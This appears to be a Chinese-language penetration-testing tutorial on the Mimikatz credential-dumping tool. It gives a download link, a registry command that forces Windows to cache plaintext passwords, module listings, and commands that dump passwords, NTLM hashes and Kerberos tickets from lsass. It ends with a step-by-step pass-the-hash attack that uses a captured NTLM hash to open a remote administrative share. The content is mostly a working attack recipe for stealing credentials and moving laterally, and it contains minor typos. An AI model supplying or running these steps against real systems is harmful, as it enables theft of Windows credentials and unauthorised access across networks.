Mimikatz下载地址:链接:https://pan.baidu.com/s/1k7i_Z_iGNbTgVeQiBKWszA 提取码:lyq1
工具简介:
Mimikatz是法国人benjamin开发的一款强大的轻量级调式工具,本意是用来个人测试,但由于其功能强大,能够直接读取Windows-XP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具
注意:
当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文
reg add HKLM/SYSTEM/CurrentControlSet/Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
Mimikatz命令
cls:清屏
standard:标准模块
crypto:加密相关模块
sekurlsa:与证书相关的模块
kerberos:kerberos模块
privilege:提权相关模块
process:进程相关模块
serivce:服务相关模块
lsadump:LsaDump模块
ts:终端服务器模块
event:事件模块
misc:杂项模块
token:令牌操作模块
vault:windows证书模块
minesweeper:Mine Sweeper模块
dpapi:DPAPI模块(通过API或RAW访问)[数据保护应用程序编程接口]
busylight:BusyLight Module
sysenv:系统环境值模块
sid:安全标识符模块
iis:IIS XML配置模块
rpc:mimikatz的RPC控制
sr98:用于SR98设备和T5577目标的RF模块
rdm:RDM(830AL)器件的射频模块
acr:ACR模块
version:查看版本
exit:退出
**提升权限 命令: privilegs::debug ** (**可以更改为任意用户)
mimikatz有许多功能都需要管理员权限,如果不是管理员权限不能debug
抓取明文密码
在windows2012以上的系统不能直接获取明文密码了,但是可以搭配procdump+mimikatz获取密码
# log
# privilege::debug
# sekurlsa::logonpasswords
已经爆出来了密码同时NTLM和LM值我们都可以查看
sekurlsa::logonpasswords解析
msv:这项是账户对于的密码的各种加密协议的密文,可以看到有LM,NTLM和SHA1加密的密文
tspkg,wdigest,kerberos:这个就是账户对于明文密码了,有的时候这三个对于的也不是全部都一样,需要看服务器是什么角色
SSP:是最新登录到其他RDP终端的账户和密码(RDP是3389远程连接)
Sekurlsa模块
sekurlsa::logonpasswords//显示登录的密码
sekurlsa::msv//抓取用户NTLM哈希
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full//加载dmp文件,并导出其中的明文密码
sekurlsa::tickets /export //导出lsass.exe进程中的所有的票据
PTH哈希传递
pass-the-hash在内网渗透是一种很经典的攻击方法,原理就是攻击者可以通过LM hash和NTLM Hash访问远程主机或者服务,而不用提供明文密码
pass the hash原理:
在windows系统中,通常会使用NTLM身份认证
NTLM认证不使用明文口令,而是使用口令加密后的hash值,hash值由系统API生成(例如LsaLogomUser)
hash分为LM hash和NT hash,如果密码长度大于15,那么无法生成LM hash,从windows Vista和Windows Server 2008 开始,微软默认禁用LM hash
如果攻击者获取了hash,就能够在身份验证的时候模拟该用户(即跳过调用API生成hash的过程)
这类攻击适用于
域/工作组环境
可以获得hash,但是条件不允许对hash爆破
内网中存在和当前机器相同密码
微软也对pth打过补丁,然而在测试中发现,打了补丁后,常规的PTH已经无法成功,但是默认的Administrator账号例外,利用这个账号依然可以进行PTH远程ipc连接
如果禁用了NTLM认证,PsExec无法利用获得的NTLM hash进行远程连接,但是使用mimikatz还是可以成功攻击,从windows到windows横向pth这一类攻击方法比较广泛
测试
mimikatz的pth功能需要本地管理员权限,这是由他的实现机制决定的,需要先获得最高权限几次呢lsass.exe信息
lsass.exe
lsass.exe是一个系统进程,由于微软windows系统的安全机制,它用于本地安全和登录策略,注意:lsass.exe也有可能是Windang.worm,irc.ratsou.b、Webus.B、MyDoom.L、Randex.AR、Nimos.worm创建的,病毒通过软盘、群发邮件和P2P文件共享进行传播
使用mimikatz获取hash
privilege::debug
sekurlsa::logonpasswords
得到hash后 使用mimikatz输入
sekurlsa::pth /user:administrator /d
omain:IP地址 /ntlm:2cefb09dda6d6f9becfa3c0f56c3dad7
弹出一个cmd窗口
执行 dir \\192.168.52.141\c$ 执行成功
总结
以上就是pth简单利用的哈希传递